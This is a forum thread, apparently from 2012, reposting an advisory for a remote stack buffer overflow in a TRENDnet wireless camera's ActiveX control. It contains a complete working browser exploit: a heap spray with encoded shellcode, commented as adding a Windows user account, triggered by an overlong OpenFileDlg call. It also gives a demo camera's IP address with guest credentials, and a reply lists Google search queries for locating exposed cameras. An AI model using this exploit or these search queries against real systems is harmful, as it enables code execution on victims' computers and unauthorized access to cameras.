The_Arhitect Posted March 29, 2012 Report Posted March 29, 2012 TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer OverflowTRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveXControl OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflowcamera demohttp://67.203.184.58:9193/admin/view.cgi?profile=0username=guestpassword=guestBackground:The mentioned product, when browsing the device web interface,asks to install an ActiveX control to stream video content.It has the following settings:File version: 1, 1, 52, 18Product name: UltraMJCam device ActiveX ControlBinary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocxProgID: UltraMJCam.UltraMJCam.1CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}Implements IObjectSafety: yesSafe for Scripting (IObjectSafety): TrueSafe for Initialization (IObjectSafety): TrueVulnerability:This ActiveX control exposed the vulnerableOpenFileDlg() method, see typelib:.../* DISPID=101 *//* VT_BSTR [8] */function OpenFileDlg( /* VT_BSTR [8] [in] */ $sFilter ){ /* method OpenFileDlg */}...By invoking this method with an overlong argument is possibleto overflow a buffer. This is because of an insecure WideCharToMultiByte() call inside UltraMJCamX.ocx:Call stack of main threadAddress Stack Procedure / arguments Called from Frame001279FC 77E6F20B kernel32.77E637DE kernel32.77E6F206 00127A0C00127A10 0299F958 kernel32.WideCharToMultiByte UltraMJC.0299F952 00127A0C00127A14 00000003 CodePage = 300127A18 00000000 Options = 000127A1C 03835C5C WideCharStr = "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00127A20 FFFFFFFF WideCharCount = FFFFFFFF (-1.)00127A24 00127A50 MultiByteStr = 00127A5000127A28 00007532 MultiByteCount = 7532 (30002.)00127A2C 00000000 pDefaultChar = NULL00127A30 00000000 pDefaultCharUsed = NULL00127A3C 029B11D0 UltraMJC.0299F920 UltraMJC.029B11CB 00127A38...0299F934 8B45 08 mov eax,dword ptr ss:[ebp+8]0299F937 C600 00 mov byte ptr ds:[eax],00299F93A 6A 00 push 00299F93C 6A 00 push 00299F93E 8B4D 10 mov ecx,dword ptr ss:[ebp+10]0299F941 51 push ecx0299F942 8B55 08 mov edx,dword ptr ss:[ebp+8]0299F945 52 push edx0299F946 6A FF push -10299F948 8B45 0C mov eax,dword ptr ss:[ebp+C]0299F94B 50 push eax0299F94C 6A 00 push 00299F94E 8B4D 14 mov ecx,dword ptr ss:[ebp+14]0299F951 51 push ecx0299F952 FF15 20319F02 call dword ptr ds:[<&KERNEL32.WideCharTo>; kernel32.WideCharToMultiByte <------------...The result is that critical structures are overwritten (SEH)allowing to execute arbitrary code against the target browser.As attachment, basic proof of concept code.<!--TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveXControl OpenFileDlg() WideCharToMultiByte Remote Buffer Overflow pocIE7-nodepcamera demohttp://67.203.184.58:9193/admin/view.cgi?profile=0username=guestpassword=guestrgod--><!-- saved from url=(0014)about:internet --> <html><object classid='clsid:707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11' id='obj' /></object><script language='javascript'>//add user one, user "sun" pass "tzu"shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +"%u7734%u4734%u4570");bigblock = unescape("%u0c0c%u0c0c");headersize = 20;slackspace = headersize+shellcode.length;while (bigblock.length<slackspace) bigblock+=bigblock;fillblock = bigblock.substring(0, slackspace);block = bigblock.substring(0, bigblock.length-slackspace);while(block.length+slackspace<0x40000) block = block+block+fillblock;memory = new Array();for (i=0;i<1888;i++){memory[i] = block+shellcode}</script><script defer=defer>var x ="";for (i=0; i<15000; i++){ x = x + "&";}obj.OpenFileDlg(x);</script>Sursa: TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow Quote
backdoor Posted April 2, 2012 Report Posted April 2, 2012 Google Dorkinurl:admin/view.cgi intitle:Wirelessalte modeleinurl:admin/view.cgi intitle:Camera Quote
napoletanii Posted April 2, 2012 Report Posted April 2, 2012 o tampenie bine de retinut , scz de offtopic dar nu ma puteam abtine Quote
